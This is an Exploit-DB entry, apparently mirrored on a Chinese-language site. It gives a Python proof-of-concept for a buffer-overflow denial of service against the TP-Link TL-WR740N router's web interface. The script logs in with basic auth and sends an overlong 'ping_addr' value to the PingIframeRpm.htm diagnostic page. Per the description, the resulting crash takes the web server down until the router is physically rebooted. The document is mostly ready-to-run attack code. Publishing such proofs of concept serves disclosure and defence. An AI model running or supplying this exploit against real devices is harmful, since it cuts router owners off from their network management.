TP-Link TL-WR740N – Buffer Overflow ‘DOS’

• Exploit Database
• 41 阅读

• 作者： Anish Feroz
  日期： 2024-03-10
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51866/

• # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
  # Date: 8/12/2023
  # Exploit Author: Anish Feroz (ZEROXINN)
  # Vendor Homepage: http://www.tp-link.com
  # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
  # Tested on: TP-Link TL-WR740N
  
  #Description:
  
  #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
  
  #Usage:
  
  #python3 target username password
  #change port, if required
  
  ------------------------------------------------POC-----------------------------------------
  
  #!/usr/bin/python
  
  import requests
  from requests.auth import HTTPBasicAuth
  import base64
  
  def send_request(ip, username, password):
  auth_url = f"http://{ip}:8082"
  target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
  
  credentials = f"{username}:{password}"
  encoded_credentials = base64.b64encode(credentials.encode()).decode()
  
  headers = {
  "Host": f"{ip}:8082",
  "Authorization": f"Basic {encoded_credentials}",
  "Upgrade-Insecure-Requests": "1",
  "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
  "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
  "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
  "Accept-Encoding": "gzip, deflate",
  "Accept-Language": "en-US,en;q=0.9",
  "Connection": "close"
  }
  
  session = requests.Session()
  
  response = session.get(target_url, headers=headers)
  
  if response.status_code == 200:
  print("Server Crashed")
  print(response.text)
  else:
  print(f"Script Completed with status code {response.status_code}")
  
  ip_address = input("Enter IP address of the host: ")
  username = input("Enter username: ")
  password = input("Enter password: ")
  
  send_request(ip_address, username, password)